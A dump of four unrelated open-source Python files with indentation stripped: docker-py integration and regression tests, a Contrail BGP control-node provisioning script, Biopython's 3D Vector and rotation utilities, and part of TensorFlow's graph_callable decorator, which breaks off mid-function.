for chunk in stream:
if six.PY3:
chunk = chunk.decode('utf-8')
logs += chunk
self.assertNotEqual(logs, '')
class TestBuildWithDockerignore(Cleanup, BaseTestCase):
def runTest(self):
if compare_version(self.client._version, '1.8') >= 0:
return
base_dir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base_dir)
with open(os.path.join(base_dir, 'Dockerfile'), 'w') as f:
f.write("\n".join([
'FROM busybox',
'MAINTAINER docker-py',
'ADD . /test',
]))
with open(os.path.join(base_dir, '.dockerignore'), 'w') as f:
f.write("\n".join([
'ignored',
'Dockerfile',
'.dockerignore',
'', # empty line
]))
with open(os.path.join(base_dir, 'not-ignored'), 'w') as f:
f.write("this file should not be ignored")
subdir = os.path.join(base_dir, 'ignored', 'subdir')
os.makedirs(subdir)
with open(os.path.join(subdir, 'file'), 'w') as f:
f.write("this file should be ignored")
tag = 'docker-py-test-build-with-dockerignore'
stream = self.client.build(
path=base_dir,
tag=tag,
)
for chunk in stream:
pass
c = self.client.create_container(tag, ['ls', '-1A', '/test'])
self.client.start(c)
self.client.wait(c)
logs = self.client.logs(c)
if six.PY3:
logs = logs.decode('utf-8')
self.assertEqual(
list(filter(None, logs.split('\n'))),
['not-ignored'],
)
#######################
# PY SPECIFIC TESTS #
#######################
class TestRunShlex(BaseTestCase):
def runTest(self):
commands = [
'true',
'echo "The Young Descendant of Tepes & Septette for the '
'Dead Princess"',
'echo -n "The Young Descendant of Tepes & Septette for the '
'Dead Princess"',
'/bin/sh -c "echo Hello World"',
'/bin/sh -c \'echo "Hello World"\'',
'echo "\"Night of Nights\""',
'true && echo "Night of Nights"'
]
for cmd in commands:
container = self.client.create_container('busybox', cmd)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
exitcode = self.client.wait(id)
self.assertEqual(exitcode, 0, msg=cmd)
class TestLoadConfig(BaseTestCase):
def runTest(self):
folder = tempfile.mkdtemp()
self.tmp_folders.append(folder)
cfg_path = os.path.join(folder, '.dockercfg')
f = open(cfg_path, 'w')
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
f.write('auth = {0}\n'.format(auth_))
f.write('email = [email protected]')
f.close()
cfg = docker.auth.load_config(cfg_path)
self.assertNotEqual(cfg[docker.auth.INDEX_NAME], None)
cfg = cfg[docker.auth.INDEX_NAME]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], '[email protected]')
self.assertEqual(cfg.get('Auth'), None)
class TestLoadJSONConfig(BaseTestCase):
def runTest(self):
folder = tempfile.mkdtemp()
self.tmp_folders.append(folder)
cfg_path = os.path.join(folder, '.dockercfg')
f = open(os.path.join(folder, '.dockercfg'), 'w')
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
email_ = '[email protected]'
f.write('{{"{0}": {{"auth": "{1}", "email": "{2}"}}}}\n'.format(
docker.auth.INDEX_URL, auth_, email_))
f.close()
cfg = docker.auth.load_config(cfg_path)
self.assertNotEqual(cfg[docker.auth.INDEX_URL], None)
cfg = cfg[docker.auth.INDEX_URL]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], '[email protected]')
self.assertEqual(cfg.get('Auth'), None)
class TestAutoDetectVersion(unittest.TestCase):
def test_client_init(self):
client = docker_client(version='auto')
client_version = client._version
api_version = client.version(api_version=False)['ApiVersion']
self.assertEqual(client_version, api_version)
api_version_2 = client.version()['ApiVersion']
self.assertEqual(client_version, api_version_2)
client.close()
def test_auto_client(self):
client = docker.AutoVersionClient(**docker_client_kwargs())
client_version = client._version
api_version = client.version(api_version=False)['ApiVersion']
self.assertEqual(client_version, api_version)
api_version_2 = client.version()['ApiVersion']
self.assertEqual(client_version, api_version_2)
client.close()
with self.assertRaises(docker.errors.DockerException):
docker.AutoVersionClient(**docker_client_kwargs(version='1.11'))
class TestConnectionTimeout(unittest.TestCase):
def setUp(self):
self.timeout = 0.5
self.client = docker.client.Client(base_url='http://192.168.10.2:4243',
timeout=self.timeout)
def runTest(self):
start = time.time()
res = None
# This call isn't supposed to complete, and it should fail fast.
try:
res = self.client.inspect_container('id')
except:
pass
end = time.time()
self.assertTrue(res is None)
self.assertTrue(end - start < 2 * self.timeout)
class UnixconnTestCase(unittest.TestCase):
"""
Test UNIX socket connection adapter.
"""
def test_resource_warnings(self):
"""
Test no warnings are produced when using the client.
"""
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
client = docker_client()
client.images()
client.close()
del client
assert len(w) == 0, \
"No warnings produced: {0}".format(w[0].message)
####################
# REGRESSION TESTS #
####################
class TestRegressions(BaseTestCase):
def test_443(self):
dfile = io.BytesIO()
with self.assertRaises(docker.errors.APIError) as exc:
for line in self.client.build(fileobj=dfile, tag="a/b/c"):
pass
self.assertEqual(exc.exception.response.status_code, 500)
dfile.close()
def test_542(self):
self.client.start(
self.client.create_container('busybox', ['true'])
)
result = self.client.containers(all=True, trunc=True)
self.assertEqual(len(result[0]['Id']), 12)
def test_647(self):
with self.assertRaises(docker.errors.APIError):
self.client.inspect_image('gensokyo.jp//kirisame')
def test_649(self):
self.client.timeout = None
ctnr = self.client.create_container('busybox', ['sleep', '2'])
self.client.start(ctnr)
self.client.stop(ctnr)
def test_715(self):
ctnr = self.client.create_container('busybox', ['id', '-u'], user=1000)
self.client.start(ctnr)
self.client.wait(ctnr)
logs = self.client.logs(ctnr)
if six.PY3:
logs = logs.decode('utf-8')
assert logs == '1000\n'
|
|
#!/usr/bin/python
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import sys
import argparse
import ConfigParser
from provision_bgp import BgpProvisioner
from vnc_api.vnc_api import *
from vnc_admin_api import VncApiAdmin
class ControlProvisioner(object):
def __init__(self, args_str=None):
self._args = None
if not args_str:
args_str = ' '.join(sys.argv[1:])
self._parse_args(args_str)
if self._args.peer_list:
peer_list = self._args.peer_list.split(',')
else:
peer_list = None
if self._args.router_asn and not self._args.oper:
self._vnc_lib = VncApiAdmin(
self._args.use_admin_api,
self._args.admin_user, self._args.admin_password,
self._args.admin_tenant_name,
self._args.api_server_ip,
self._args.api_server_port, '/',
api_server_use_ssl=self._args.api_server_use_ssl)
# Update global system config also with this ASN
gsc_obj = self._vnc_lib.global_system_config_read(
fq_name=['default-global-system-config'])
gsc_obj.set_autonomous_system(self._args.router_asn)
if self._args.ibgp_auto_mesh is not None:
gsc_obj.set_ibgp_auto_mesh(self._args.ibgp_auto_mesh)
if self._args.set_graceful_restart_parameters == True:
gr_params = GracefulRestartParametersType()
gr_params.set_restart_time(
int(self._args.graceful_restart_time))
gr_params.set_long_lived_restart_time(
int(self._args.long_lived_graceful_restart_time))
gr_params.set_end_of_rib_timeout(
int(self._args.end_of_rib_timeout))
gr_params.set_enable(self._args.graceful_restart_enable)
gr_params.set_bgp_helper_enable(
self._args.graceful_restart_bgp_helper_enable)
gr_params.set_xmpp_helper_enable(
self._args.graceful_restart_xmpp_helper_enable)
gsc_obj.set_graceful_restart_parameters(gr_params)
self._vnc_lib.global_system_config_update(gsc_obj)
return
bp_obj = BgpProvisioner(
self._args.admin_user, self._args.admin_password,
self._args.admin_tenant_name,
self._args.api_server_ip, self._args.api_server_port,
api_server_use_ssl=self._args.api_server_use_ssl,
use_admin_api=self._args.use_admin_api,
sub_cluster_name=self._args.sub_cluster_name,
peer_list=peer_list)
if self._args.oper == 'add':
if self._args.sub_cluster_name:
bp_obj.add_bgp_router('external-control-node',
self._args.host_name,
self._args.host_ip, self._args.router_asn,
self._args.address_families, self._args.md5,
self._args.local_autonomous_system,
self._args.bgp_server_port)
else:
bp_obj.add_bgp_router('control-node', self._args.host_name,
self._args.host_ip, self._args.router_asn,
self._args.address_families, self._args.md5,
self._args.local_autonomous_system,
self._args.bgp_server_port)
elif self._args.oper == 'del':
bp_obj.del_bgp_router(self._args.host_name)
else:
print "Unknown operation %s. Only 'add' and 'del' supported"\
% (self._args.oper)
# end __init__
def gr_time_type(self, value):
time = int(value)
if time < 0 or time > 4095:
raise argparse.ArgumentTypeError("graceful_restart_time %s must be in range (0..4095)" % value)
return time
def llgr_time_type(self, value):
time = int(value)
if time < 0 or time > 16777215:
raise argparse.ArgumentTypeError("long_lived_graceful_restart_time %s must be in range (0..16777215)" % value)
return time
def _parse_args(self, args_str):
'''
Eg. python provision_control.py --host_name a3s30.contrail.juniper.net
--host_ip 10.1.1.1
--router_asn 64512
--ibgp_auto_mesh|--no_ibgp_auto_mesh
--api_server_ip 127.0.0.1
--api_server_port 8082
--api_server_use_ssl False
--oper <add | del>
--md5 <key value>|None(optional)
--bgp_server_port <port>|None(optional)
--local_autonomous_system <ASN value>|None(optional)
--graceful_restart_time 300
--long_lived_graceful_restart_time 300
--end_of_rib_timeout 300
--set_graceful_restart_parameters False
--graceful_restart_bgp_helper_enable False
--graceful_restart_xmpp_helper_enable False
--graceful_restart_enable False
'''
# Source any specified config/ini file
# Turn off help, so we print all options in response to -h
conf_parser = argparse.ArgumentParser(add_help=False)
conf_parser.add_argument("-c", "--conf_file",
help="Specify config file", metavar="FILE")
args, remaining_argv = conf_parser.parse_known_args(args_str.split())
defaults = {
'router_asn': '64512',
'bgp_server_port': 179,
'local_autonomous_system': None,
'ibgp_auto_mesh': None,
'api_server_ip': '127.0.0.1',
'api_server_port': '8082',
'api_server_use_ssl': False,
'oper': None,
'admin_user': None,
'admin_password': None,
'admin_tenant_name': None,
'md5' : None,
'graceful_restart_time': 300,
'long_lived_graceful_restart_time': 300,
'end_of_rib_timeout': 300,
'graceful_restart_bgp_helper_enable': False,
'graceful_restart_xmpp_helper_enable': False,
'graceful_restart_enable': False,
'set_graceful_restart_parameters': False,
'sub_cluster_name': None,
'peer_list':None,
}
if args.conf_file:
config = ConfigParser.SafeConfigParser()
config.read([args.conf_file])
defaults.update(dict(config.items("DEFAULTS")))
# Override with CLI options
# Don't surpress add_help here so it will handle -h
parser = argparse.ArgumentParser(
# Inherit options from config_parser
parents=[conf_parser],
# print script description with -h/--help
description=__doc__,
# Don't mess with format of description
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.set_defaults(**defaults)
parser.add_argument(
"--host_name", help="hostname name of control-node")
parser.add_argument("--host_ip", help="IP address of control-node")
parser.add_argument(
"--router_asn", help="AS Number the control-node is in", required=True)
parser.add_argument(
"--bgp_server_port", help="BGP server port number (Default: 179)")
parser.add_argument(
"--local_autonomous_system", help="Local autonomous-system number used to peer contrail-control bgp speakers across different geographic locations")
parser.add_argument(
"--address_families", help="Address family list",
choices=["route-target", "inet-vpn", "e-vpn", "erm-vpn", "inet6-vpn"],
nargs="*", default=[])
parser.add_argument(
"--md5", help="Md5 config for the node")
parser.add_argument(
"--ibgp_auto_mesh", help="Create iBGP mesh automatically", dest='ibgp_auto_mesh', action='store_true')
parser.add_argument(
"--no_ibgp_auto_mesh", help="Don't create iBGP mesh automatically", dest='ibgp_auto_mesh', action='store_false')
parser.add_argument("--api_server_port", help="Port of api server")
parser.add_argument("--api_server_use_ssl",
help="Use SSL to connect with API server")
parser.add_argument(
"--oper",
help="Provision operation to be done(add or del)")
parser.add_argument(
"--admin_user", help="Name of keystone admin user")
parser.add_argument(
"--admin_password", help="Password of keystone admin user")
parser.add_argument(
"--admin_tenant_name", help="Tenamt name for keystone admin user")
parser.add_argument(
"--graceful_restart_time",
help="Graceful Restart Time in seconds (0..4095)",
type=self.gr_time_type, default=300,
required=False)
parser.add_argument(
"--long_lived_graceful_restart_time",
help="Long Lived Graceful Restart Time in seconds (0..16777215)",
type=self.llgr_time_type, default=300,
required=False)
parser.add_argument(
"--end_of_rib_timeout",
help="EndOfRib timeout value in seconds (0..4095)",
type=self.gr_time_type, default=300,
required=False)
parser.add_argument("--graceful_restart_bgp_helper_enable",
action='store_true',
help="Enable helper mode for BGP graceful restart")
parser.add_argument("--graceful_restart_xmpp_helper_enable",
action='store_true',
help="Enable helper mode for XMPP graceful restart")
parser.add_argument("--graceful_restart_enable",
action='store_true',
help="Enable Graceful Restart")
parser.add_argument("--set_graceful_restart_parameters",
action='store_true',
help="Set Graceful Restart Parameters")
parser.add_argument(
"--sub_cluster_name", help="sub cluster to associate to",
required=False)
parser.add_argument(
"--peer_list", help="list of control node names to peer",
required=False)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument(
"--api_server_ip", help="IP address of api server",
nargs='+', type=str)
group.add_argument("--use_admin_api",
default=False,
help = "Connect to local api-server on admin port",
action="store_true")
self._args = parser.parse_args(remaining_argv)
# end _parse_args
# end class ControlProvisioner
def main(args_str=None):
ControlProvisioner(args_str)
# end main
if __name__ == "__main__":
main()
|
|
# Copyright (C) 2004, Thomas Hamelryck ([email protected])
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Vector class, including rotation-related functions."""
import numpy
def m2rotaxis(m):
"""
Return angles, axis pair that corresponds to rotation matrix m.
"""
# Angle always between 0 and pi
# Sense of rotation is defined by axis orientation
t=0.5*(numpy.trace(m)-1)
t=max(-1, t)
t=min(1, t)
angle=numpy.arccos(t)
if angle<1e-15:
# Angle is 0
return 0.0, Vector(1,0,0)
elif angle<numpy.pi:
# Angle is smaller than pi
x=m[2,1]-m[1,2]
y=m[0,2]-m[2,0]
z=m[1,0]-m[0,1]
axis=Vector(x,y,z)
axis.normalize()
return angle, axis
else:
# Angle is pi - special case!
m00=m[0,0]
m11=m[1,1]
m22=m[2,2]
if m00>m11 and m00>m22:
x=numpy.sqrt(m00-m11-m22+0.5)
y=m[0,1]/(2*x)
z=m[0,2]/(2*x)
elif m11>m00 and m11>m22:
y=numpy.sqrt(m11-m00-m22+0.5)
x=m[0,1]/(2*y)
z=m[1,2]/(2*y)
else:
z=numpy.sqrt(m22-m00-m11+0.5)
x=m[0,2]/(2*z)
y=m[1,2]/(2*z)
axis=Vector(x,y,z)
axis.normalize()
return numpy.pi, axis
def vector_to_axis(line, point):
"""
Returns the vector between a point and
the closest point on a line (ie. the perpendicular
projection of the point on the line).
@type line: L{Vector}
@param line: vector defining a line
@type point: L{Vector}
@param point: vector defining the point
"""
line=line.normalized()
np=point.norm()
angle=line.angle(point)
return point-line**(np*numpy.cos(angle))
def rotaxis2m(theta, vector):
"""
Calculate a left multiplying rotation matrix that rotates
theta rad around vector.
Example:
>>> m=rotaxis(pi, Vector(1,0,0))
>>> rotated_vector=any_vector.left_multiply(m)
@type theta: float
@param theta: the rotation angle
@type vector: L{Vector}
@param vector: the rotation axis
@return: The rotation matrix, a 3x3 Numeric array.
"""
vector=vector.copy()
vector.normalize()
c=numpy.cos(theta)
s=numpy.sin(theta)
t=1-c
x,y,z=vector.get_array()
rot=numpy.zeros((3,3))
# 1st row
rot[0,0]=t*x*x+c
rot[0,1]=t*x*y-s*z
rot[0,2]=t*x*z+s*y
# 2nd row
rot[1,0]=t*x*y+s*z
rot[1,1]=t*y*y+c
rot[1,2]=t*y*z-s*x
# 3rd row
rot[2,0]=t*x*z-s*y
rot[2,1]=t*y*z+s*x
rot[2,2]=t*z*z+c
return rot
rotaxis=rotaxis2m
def refmat(p,q):
"""
Return a (left multiplying) matrix that mirrors p onto q.
Example:
>>> mirror=refmat(p,q)
>>> qq=p.left_multiply(mirror)
>>> print q, qq # q and qq should be the same
@type p,q: L{Vector}
@return: The mirror operation, a 3x3 Numeric array.
"""
p.normalize()
q.normalize()
if (p-q).norm()<1e-5:
return numpy.identity(3)
pq=p-q
pq.normalize()
b=pq.get_array()
b.shape=(3, 1)
i=numpy.identity(3)
ref=i-2*numpy.dot(b, numpy.transpose(b))
return ref
def rotmat(p,q):
"""
Return a (left multiplying) matrix that rotates p onto q.
Example:
>>> r=rotmat(p,q)
>>> print q, p.left_multiply(r)
@param p: moving vector
@type p: L{Vector}
@param q: fixed vector
@type q: L{Vector}
@return: rotation matrix that rotates p onto q
@rtype: 3x3 Numeric array
"""
rot=numpy.dot(refmat(q, -p), refmat(p, -p))
return rot
def calc_angle(v1, v2, v3):
"""
Calculate the angle between 3 vectors
representing 3 connected points.
@param v1, v2, v3: the tree points that define the angle
@type v1, v2, v3: L{Vector}
@return: angle
@rtype: float
"""
v1=v1-v2
v3=v3-v2
return v1.angle(v3)
def calc_dihedral(v1, v2, v3, v4):
"""
Calculate the dihedral angle between 4 vectors
representing 4 connected points. The angle is in
]-pi, pi].
@param v1, v2, v3, v4: the four points that define the dihedral angle
@type v1, v2, v3, v4: L{Vector}
"""
ab=v1-v2
cb=v3-v2
db=v4-v3
u=ab**cb
v=db**cb
w=u**v
angle=u.angle(v)
# Determine sign of angle
try:
if cb.angle(w)>0.001:
angle=-angle
except ZeroDivisionError:
# dihedral=pi
pass
return angle
class Vector(object):
"3D vector"
def __init__(self, x, y=None, z=None):
if y is None and z is None:
# Array, list, tuple...
if len(x)!=3:
raise ValueError("Vector: x is not a "
"list/tuple/array of 3 numbers")
self._ar=numpy.array(x, 'd')
else:
# Three numbers
self._ar=numpy.array((x, y, z), 'd')
def __repr__(self):
x,y,z=self._ar
return "<Vector %.2f, %.2f, %.2f>" % (x,y,z)
def __neg__(self):
"Return Vector(-x, -y, -z)"
a=-self._ar
return Vector(a)
def __add__(self, other):
"Return Vector+other Vector or scalar"
if isinstance(other, Vector):
a=self._ar+other._ar
else:
a=self._ar+numpy.array(other)
return Vector(a)
def __sub__(self, other):
"Return Vector-other Vector or scalar"
if isinstance(other, Vector):
a=self._ar-other._ar
else:
a=self._ar-numpy.array(other)
return Vector(a)
def __mul__(self, other):
"Return Vector.Vector (dot product)"
return sum(self._ar*other._ar)
def __div__(self, x):
"Return Vector(coords/a)"
a=self._ar/numpy.array(x)
return Vector(a)
def __pow__(self, other):
"Return VectorxVector (cross product) or Vectorxscalar"
if isinstance(other, Vector):
a,b,c=self._ar
d,e,f=other._ar
c1=numpy.linalg.det(numpy.array(((b,c), (e,f))))
c2=-numpy.linalg.det(numpy.array(((a,c), (d,f))))
c3=numpy.linalg.det(numpy.array(((a,b), (d,e))))
return Vector(c1,c2,c3)
else:
a=self._ar*numpy.array(other)
return Vector(a)
def __getitem__(self, i):
return self._ar[i]
def __setitem__(self, i, value):
self._ar[i]=value
def norm(self):
"Return vector norm"
return numpy.sqrt(sum(self._ar*self._ar))
def normsq(self):
"Return square of vector norm"
return abs(sum(self._ar*self._ar))
def normalize(self):
"Normalize the Vector"
self._ar=self._ar/self.norm()
def normalized(self):
"Return a normalized copy of the Vector"
v=self.copy()
v.normalize()
return v
def angle(self, other):
"Return angle between two vectors"
n1=self.norm()
n2=other.norm()
c=(self*other)/(n1*n2)
# Take care of roundoff errors
c=min(c,1)
c=max(-1,c)
return numpy.arccos(c)
def get_array(self):
"Return (a copy of) the array of coordinates"
return numpy.array(self._ar)
def left_multiply(self, matrix):
"Return Vector=Matrix x Vector"
a=numpy.dot(matrix, self._ar)
return Vector(a)
def right_multiply(self, matrix):
"Return Vector=Vector x Matrix"
a=numpy.dot(self._ar, matrix)
return Vector(a)
def copy(self):
"Return a deep copy of the Vector"
return Vector(self._ar)
if __name__=="__main__":
from numpy.random import random
v1=Vector(0,0,1)
v2=Vector(0,0,0)
v3=Vector(0,1,0)
v4=Vector(1,1,0)
v4.normalize()
print v4
print calc_angle(v1, v2, v3)
dih=calc_dihedral(v1, v2, v3, v4)
# Test dihedral sign
assert(dih>0)
print "DIHEDRAL ", dih
ref=refmat(v1, v3)
rot=rotmat(v1, v3)
print v3
print v1.left_multiply(ref)
print v1.left_multiply(rot)
print v1.right_multiply(numpy.transpose(rot))
# -
print v1-v2
print v1-1
print v1+(1,2,3)
# +
print v1+v2
print v1+3
print v1-(1,2,3)
# *
print v1*v2
# /
print v1/2
print v1/(1,2,3)
# **
print v1**v2
print v1**2
print v1**(1,2,3)
# norm
print v1.norm()
# norm squared
print v1.normsq()
# setitem
v1[2]=10
print v1
# getitem
print v1[2]
print numpy.array(v1)
print "ROT"
angle=random()*numpy.pi
axis=Vector(random(3)-random(3))
axis.normalize()
m=rotaxis(angle, axis)
cangle, caxis=m2rotaxis(m)
print angle-cangle
print axis-caxis
print
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Decorator that produces a callable object that executes a TensorFlow graph.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.eager import tape
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops as tf_ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
def _default_initializer(name, shape, dtype):
"""The default initializer for variables."""
# pylint: disable=protected-access
store = variable_scope._get_default_variable_store()
initializer = store._get_default_initializer(name, shape=shape, dtype=dtype)
# pylint: enable=protected-access
return initializer[0]
class _CapturedVariable(object):
"""Variable captured by graph_callable.
Internal to the implementation of graph_callable. Created only by
_VariableCapturingScope and used only to read the variable values when calling
the function after the variables are initialized.
"""
def __init__(self, name, initializer, shape, dtype, trainable):
self.name = name
if initializer is None:
initializer = _default_initializer(name, shape, dtype)
initial_value = lambda: initializer(shape, dtype=dtype)
with context.eager_mode():
self.variable = resource_variable_ops.ResourceVariable(
initial_value=initial_value, name=name, dtype=dtype,
trainable=trainable)
self.shape = shape
self.dtype = dtype
self.placeholder = None
self.trainable = trainable
def read(self, want_gradients=True):
if want_gradients and self.trainable:
v = tape.watch_variable(self.variable)
else:
v = self.variable
return v.read_value()
class _VariableCapturingScope(object):
"""Variable-scope-like object which captures tf.get_variable calls.
This is responsible for the main difference between the initialization version
of a function object and the calling version of a function object.
capturing_scope replaces calls to tf.get_variable with placeholder tensors to
be fed the variable's current value. TODO(apassos): these placeholders should
instead be objects implementing a similar API to tf.Variable, for full
compatibility.
initializing_scope replaces calls to tf.get_variable with creation of
variables and initialization of their values. This allows eventual support of
initialized_value and friends.
TODO(apassos): once the eager mode layers API is implemented support eager
func-to-object as well.
"""
def __init__(self):
self.variables = {}
self.tf_variables = {}
@contextlib.contextmanager
def capturing_scope(self):
"""Context manager to capture variable creations.
Replaces variable accesses with placeholders.
Yields:
nothing
"""
# TODO(apassos) ignoring the regularizer and partitioner here; figure out
# how to deal with these.
def _custom_getter(getter=None, name=None, shape=None, dtype=dtypes.float32, # pylint: disable=missing-docstring
initializer=None, regularizer=None, reuse=None,
trainable=True, collections=None, caching_device=None, # pylint: disable=redefined-outer-name
partitioner=None, validate_shape=True,
use_resource=None):
del getter, regularizer, partitioner, validate_shape, use_resource, dtype
del collections, initializer, trainable, reuse, caching_device, shape,
assert name in self.variables
v = self.variables[name]
return v.variable
scope = variable_scope.get_variable_scope()
with variable_scope.variable_scope(scope, custom_getter=_custom_getter):
yield
@contextlib.contextmanager
def initializing_scope(self):
"""Context manager to capture variable creations.
Forcibly initializes all created variables.
Yields:
nothing
"""
# TODO(apassos) ignoring the regularizer and partitioner here; figure out
# how to deal with these.
def _custom_getter(getter=None, name=None, shape=None, dtype=dtypes.float32, # pylint: disable=missing-docstring
initializer=None, regularizer=None, reuse=None,
trainable=True, collections=None, caching_device=None, # pylint: disable=redefined-outer-name
partitioner=None, validate_shape=True,
use_resource=None):
del getter, regularizer, collections, caching_device, partitioner
del use_resource, validate_shape
if name in self.tf_variables:
if reuse:
return self.tf_variables[name].initialized_value()
else:
raise ValueError("Specified reuse=%s but tried to reuse variables."
% reuse)
# TODO(apassos): ensure this is on the same device as above
v = _CapturedVariable(name, initializer, shape, dtype, trainable)
self.variables[name] = v
graph_mode_resource = v.variable.handle
if initializer is None:
initializer = _default_initializer(name, shape, dtype)
resource_variable_ops.shape_safe_assign_variable_handle(
graph_mode_resource, v.variable.shape, initializer(shape, dtype))
return v.variable
scope = variable_scope.get_variable_scope()
with variable_scope.variable_scope(scope, custom_getter=_custom_getter):
yield
class _InitializingFunctionObject(object):
"""Responsible for deciding which version of func-to-object to call.
call_fn is the version which calls the function with the current values of the
variables and init_fn is the version which calls the function to initialize
all variables.
TODO(apassos): figure out a way to support initializing only _some_
variables. This requires a way to pull out a variable's initialization code
from the graph, which might not be possible in general.
"""
def __init__(self, call_fn, init_fn, shape_and_dtypes):
self._init_fn = init_fn
self._call_fn = call_fn
self.shape_and_dtypes = shape_and_dtypes
self.flattened_shapes = [tensor_shape.as_shape(sd.shape) for sd in
nest.flatten(self.shape_and_dtypes)]
@property
def variables(self):
return self._call_fn.variables
def __call__(self, *args):
nest.assert_same_structure(self.shape_and_dtypes, args, check_types=False)
if not all([
shape.is_compatible_with(arg.shape)
for shape, arg in zip(self.flattened_shapes, nest.flatten(args))
]):
raise ValueError(
"Declared shapes do not match argument shapes: Expected %s, found %s."
% (self.flattened_shapes, [arg.shape for arg in nest.flatten(args)]))
initialized = [resource_variable_ops.var_is_initialized_op(
v.handle).numpy() for v in self._call_fn.variables]
if all(x for x in initialized):
for v in self._call_fn.variables:
if v._trainable: # pylint: disable=protected-access
tape.watch_variable(v)
return self._call_fn(*args)
elif all(not x for x in initialized):
return self._init_fn(*args)
else:
raise ValueError("Some, but not all, variables are initialized.")
def _get_graph_callable_inputs(shape_and_dtypes):
"""Maps specified shape_and_dtypes to graph inputs."""
ret = []
for x in shape_and_dtypes:
if isinstance(x, ShapeAndDtype):
ret.append(array_ops.placeholder(x.dtype, x.shape))
elif isinstance(x, (tuple, list)):
ret.append(_get_graph_callable_inputs(x))
else:
raise errors.InvalidArgumentError(
None, None, "Expected the argument to @graph_callable to be a "
"(possibly nested) list or tuple of ShapeAndDtype objects, "
"but got an object of type: %s" % type(x))
return tuple(ret) if isinstance(shape_and_dtypes, tuple) else ret
def _graph_callable_internal(func, shape_and_dtypes):
"""Defines and returns a template version of func.
Under the hood we make two function objects, each wrapping a different version
of the graph-mode code. One version immediately runs variable initialization
before making the variable's Tensors available for use, while the other
version replaces the Variables with placeholders which become function
arguments and get the current variable's value.
Limitations in (2) and (4) are because this does not implement a graph-mode
Variable class which has a convert_to_tensor(as_ref=True) method and a
initialized_value method. This is fixable.
Args:
func: The tfe Python function to compile.
shape_and_dtypes: A possibly nested list or tuple of ShapeAndDtype objects.
Raises:
ValueError: If any one of func's outputs is not a Tensor.
Returns:
Callable graph object.
"""
container = tf_ops.get_default_graph()._container # pylint: disable=protected-access
graph_key = tf_ops.get_default_graph()._graph_key # pylint: disable=protected-access
with context.graph_mode():
# This graph will store both the initialization and the call version of the
# wrapped function. It will later be used by the backprop code to build the
# backprop graph, if necessary.
captures = {}
tmp_graph = function.CapturingGraph(captures)
# Inherit the graph key from the original graph to ensure optimizers don't
# misbehave.
tmp_graph._container = container # pylint: disable=protected-access
tmp_graph._graph_key = graph_key # pylint: disable=protected-access
with tmp_graph.as_default():
# Placeholders for the non-variable inputs.
func_inputs = _get_graph_callable_inputs(shape_and_dtypes)
func_num_args = len(tf_inspect.getargspec(func).args)
if len(func_inputs) != func_num_args:
raise TypeError("The number of arguments accepted by the decorated "
"function `%s` (%d) must match the number of "
"ShapeAndDtype objects passed to the graph_callable() "
"decorator (%d)." %
(func.__name__, func_num_args, len(func_inputs)))
# First call the function to generate a graph which can initialize all
# variables. As a side-effect this will populate the variable capturing
# scope's view of which variables exist.
variable_captures = _VariableCapturingScope()
with variable_captures.initializing_scope(), function.capture_tensors(
captures), function.AutomaticControlDependencies() as a:
func_outputs = func(*func_inputs)
outputs_list = nest.flatten(func_outputs)
for i, x in enumerate(outputs_list):
if x is not None:
outputs_list[i] = a.mark_as_return(x)
if len(outputs_list) == 1 and outputs_list[0] is None:
outputs_list = []
output_shapes = [x.shape for x in outputs_list]
if not all(isinstance(x, tf_ops.Tensor) for x in outputs_list):
raise ValueError("Found non-tensor output in %s" % str(outputs_list))
initializing_operations = tmp_graph.get_operations()
# Call the function again, now replacing usages of variables with
# placeholders. This assumes the variable capturing scope created above
# knows about all variables.
tmp_graph.clear_resource_control_flow_state()
with variable_captures.capturing_scope(), function.capture_tensors(
captures), function.AutomaticControlDependencies() as a:
captured_outputs = func(*func_inputs)
captured_outlist = nest.flatten(captured_outputs)
for i, x in enumerate(captured_outlist):
if x is not None:
captured_outlist[i] = a.mark_as_return(x)
capturing_operations = tmp_graph.get_operations()[
len(initializing_operations):]
sorted_variables = sorted(variable_captures.variables.values(),
key=lambda x: x.name)
ids = list(sorted(captures.keys()))
if ids:
extra_inputs, extra_placeholders = zip(*[captures[x] for x in ids])
else:
extra_inputs = []
extra_placeholders = []
flat_inputs = [x for x in nest.flatten(func_inputs)
if isinstance(x, tf_ops.Tensor)]
placeholder_inputs = flat_inputs+ list(extra_placeholders)
func_def_outputs = [x for x in outputs_list if isinstance(x, tf_ops.Tensor)]
initialization_name = function._inference_name(func.__name__) # pylint: disable=protected-access
# TODO(ashankar): Oh lord, forgive me for this lint travesty.
# Also, what about the gradient registry of these functions? Those need to be
# addressed as well.
for f in tmp_graph._functions.values(): # pylint: disable=protected-access
function._register(f._c_func.func) # pylint: disable=protected-access
initializer_function = function.GraphModeFunction(
initialization_name,
placeholder_inputs,
extra_inputs,
tmp_graph,
initializing_operations,
func_def_outputs,
func_outputs,
output_shapes)
capture_func_def_outputs = [
